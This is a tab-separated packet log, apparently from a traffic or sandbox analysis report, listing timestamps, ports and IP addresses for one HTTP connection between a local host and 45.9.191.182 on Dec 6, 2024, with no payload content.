Dec 6, 2024 11:05:31.363750935 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.366234064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.366246939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.366296053 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.369096041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.369107962 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.369160891 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.370331049 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.370343924 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.370395899 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.372481108 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.372641087 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.372684956 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.375121117 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.426942110 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.467461109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.467673063 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.467732906 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.468213081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.468225956 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.468262911 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.469815016 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.469907999 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.469957113 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.472203016 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.472333908 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.472385883 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.474392891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.474484921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.474539042 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.476489067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.476583004 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.476629972 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.478703976 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.478780031 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.478827000 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.480865955 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.480990887 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.481040001 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.485279083 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.485300064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.485342026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.485990047 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.486001968 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.486042976 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.487015009 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.487262964 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.487319946 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.489084959 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.489104986 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.489156961 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.490997076 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.491285086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.491333961 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.492969036 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.493087053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.493139029 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.494959116 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.495019913 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.495065928 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.496807098 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.496902943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.496948004 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.498642921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.498783112 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.498828888 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.500515938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.500592947 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.500638962 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.502440929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.502648115 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.502696991 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.504304886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.504448891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.504493952 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.506167889 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.506509066 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.506556034 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.508038044 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.508265972 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.508312941 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.509882927 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.510035992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.510083914 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.511744976 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.511965990 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.512010098 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.516823053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.516835928 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.516851902 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.516864061 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.516885042 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.516916037 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.517507076 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.517518997 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.517560959 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.519202948 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.519320965 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.519370079 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.521114111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.521161079 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.521217108 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.522984982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.523044109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.523109913 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.524815083 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.525013924 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.525070906 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.526699066 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.526933908 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.526984930 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.531651974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.531665087 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.531694889 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.531708002 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.531733036 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.531745911 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.533499002 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.533649921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.533701897 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.535366058 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.535377026 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.535418034 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.536946058 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.536957979 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.536999941 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.537895918 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.538009882 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.538058996 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.539776087 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.539829969 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.539875984 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.541587114 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.541690111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.541733980 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.543519020 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.543632030 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.543677092 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.545429945 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.545480013 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.545526981 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.547383070 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.548091888 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.548139095 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.550944090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.550956011 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.550975084 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.550996065 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.551033974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.551150084 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.553069115 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.553088903 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.553145885 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.554713011 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.555212021 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.555260897 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.556750059 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.556775093 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.556838036 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.558554888 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.558568954 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.558604956 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.560640097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.560652971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.560693026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.562088966 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.562499046 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.562573910 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.565284014 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.614434958 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.659025908 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.659071922 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.659135103 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.659795046 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.659898043 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.659948111 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.661318064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.661856890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.661911011 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.661957026 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.663397074 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.663449049 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.663647890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.664841890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.664881945 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.664889097 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.666335106 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.666414022 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.666425943 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.667717934 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.667762041 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.667886972 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.669174910 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.669229984 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.669267893 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.670603991 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.670650005 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.670658112 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.672049046 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.672095060 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.672147989 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.673495054 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.673542023 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.673613071 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.674959898 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.675009012 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.675067902 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.676435947 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.676481009 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.676587105 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.677829981 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.677877903 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.677946091 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.679657936 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.679701090 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.679749012 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.680743933 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.680788040 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.680790901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.682019949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.682069063 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.682168961 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.683353901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.683402061 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.683434963 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.684652090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.684695959 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.684932947 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.685967922 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.686019897 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.686048031 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.687278986 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.687325954 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.687604904 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.688566923 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.688613892 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.688646078 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.689843893 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.689891100 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.689929008 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.691124916 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.691167116 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.691240072 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.692442894 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.692498922 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.692523956 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.693679094 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.693816900 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.693878889 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.694951057 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.695010900 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.695065975 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.696223021 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.696347952 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.696413994 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.697508097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.697637081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.697659969 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.698795080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.698882103 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.698896885 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.700094938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.700169086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.700216055 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.701358080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.701409101 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.701488972 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.702617884 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.702683926 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.702800989 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.703933001 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.703983068 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.704041004 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.705249071 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.705310106 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.705396891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.706552029 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.706598997 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.706655025 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.707767963 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.707921028 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.707977057 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.709074974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.709172010 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.709254026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.710319996 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.710366964 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.710454941 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.711666107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.711713076 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.711806059 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.712894917 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.712975025 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.713015079 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.714220047 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.714308023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.714369059 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.715461969 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.715576887 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.715626001 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.716758013 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.716907978 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.716970921 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.718089104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.718135118 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.718175888 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.719361067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.719409943 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.719449043 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.720622063 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.720674992 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.720726967 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.721894979 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.721944094 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.721971035 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.723184109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.723297119 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.723345995 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.724442005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.724551916 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.724600077 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.725722075 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.725769043 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.725838900 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.727045059 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.727130890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.727190018 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.728316069 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.728353977 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.728430033 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.770653009 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.851270914 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.851471901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.851878881 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.852006912 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.852015018 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.852953911 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.853010893 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.853076935 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.853127956 CET	49708	80	192.168.2.10	45.9.191.182
